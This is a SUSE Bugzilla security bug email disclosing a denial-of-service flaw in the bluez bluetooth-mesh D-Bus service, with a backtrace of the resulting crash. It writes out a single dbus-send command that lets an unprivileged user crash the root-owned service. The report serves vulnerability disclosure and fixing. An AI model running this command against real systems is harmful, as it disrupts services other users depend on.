http://bugzilla.suse.com/show_bug.cgi?id=1152672 Bug ID: 1152672 Summary: VUL-0: bluez: bluetooth-mesh D-Bus service can be crashed by regular user Classification: openSUSE Product: openSUSE Tumbleweed Version: Current Hardware: Other OS: Other Status: NEW Severity: Normal Priority: P5 - None Component: Security Assignee: seife@novell.slipkontur.de Reporter: matthias.gerstner@suse.com QA Contact: qa-bugs@suse.de CC: matthias.gerstner@suse.com, vbotka@suse.com Blocks: 1151518 Found By: --- Blocker: --- +++ This bug was initially created as a clone of Bug #1151518 The new bluetooth-mesh D-Bus service which is reviewed in bug 1151518 has a DoS vulnerability that allows a regular user to crash the root owned D-Bus service. To do so the following D-Bus call can be employed: $ dbus-send --system --type=method_call --print-reply --dest=org.bluez.mesh /org/bluez/mesh org.bluez.mesh.Network1.Join objpath:/org/gnome/DisplayManager array:byte:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 After a timeout of about 20 seconds the D-Bus service will crash due to a null pointer dereference with the following backtrace: node_init_cb (node=0x0, agent=0x0) at mesh/mesh.c:359 359 reply = dbus_error(join_pending->msg, MESH_ERROR_FAILED, (gdb) bt user_data=0x5555555be170) at mesh/node.c:1760 dbus=<optimized out>) at ell/dbus.c:216 user_data=0x5555555a6e00) at ell/dbus.c:279 user_data=0x5555555a7ef0) at ell/io.c:126 at ell/main.c:642 at mesh/main.c:205 The reason is probably that the `join_pending` data structure has already been freed in a different function. -- You are receiving this mail because: You are on the CC list for the bug.